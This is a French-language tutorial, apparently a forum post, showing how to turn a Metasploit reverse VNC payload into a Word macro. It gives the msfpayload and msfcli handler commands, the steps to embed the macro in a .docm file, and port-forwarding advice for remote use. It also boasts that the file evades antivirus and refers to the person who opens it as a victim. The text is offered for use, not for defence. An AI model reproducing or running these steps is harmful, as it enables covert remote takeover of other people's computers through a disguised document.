Dans ce tuto, nous allons utiliser Metasploit pour créer une macro pour Word, laquelle une fois exécutée, lancera un reverse vnc. Et pour couronner le tout, le fichier Word contenant la macro passe sans encombres les tests des anti-virus.

Créer la macro qui sera intégrée au fichier Word:
./msfpayload windows/vncinject/reverse_tcp LHOST=VOTRE_IP V > /chemin/du/fichier/vbvnc.bas
et la transférer sur un poste windows

Sous windows, ouvrir Word (la procédure suivante a été effectuée sous Word2007):
Tout d'abord faire afficher l'onglet "Développeur" qui permettra d'insérer une macro au fichier:
Boutton de démarrage Word > Options Word > Section "Standard" > Cocher "Afficher l'onglet Développeur..."
Aller dans l'onglet "Développeur" pour ajouter la macro, et cliquer sur le boutton "Visual Basic"
Dans la nouvelle fenetre, importer la macro:
Fichier > Importer un fichier > Sélectionner le fichier .bas > Fichier > Enregister (comme type de fichier, choisir .docm)
Fermer la fenetre Visual Basic ainsi que Word.

De retour sous BackTrack, lancer Metasploit:
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=VOTRE_IP DisableCourtesyShell=True E

Lorsque la cible sur le poste windows ouvrira le fichier, il lui sera demandé si elle souhaite accepter ou non l'exécution de la macro, si elle accepte, la connexion sera initiée, et le client VNC s'ouvrira sur le poste BackTrack.

ENJOY!

P.S.: Le souci avec le payload VNC, c'est que lorsque la connexion s'établit, la victime perd son poiteur de souris, ce qui n'est franchement pas discret... Personellement je préfere quand meme un bon vieux reverse shell, meme si faut avouer que le VNC ca en jete quand meme big_smile

Edit: Pour utiliser cet exploit en remote, il faut rediriger le port 4444 (utilisé par metasploit pour l'exploit) vers votre machine. Plus de détails dans cette vidéo.
(Un grand merci à Benjy pour avoir trouvé la solution big_smile)

Tutoriel tiré de cette vidéo.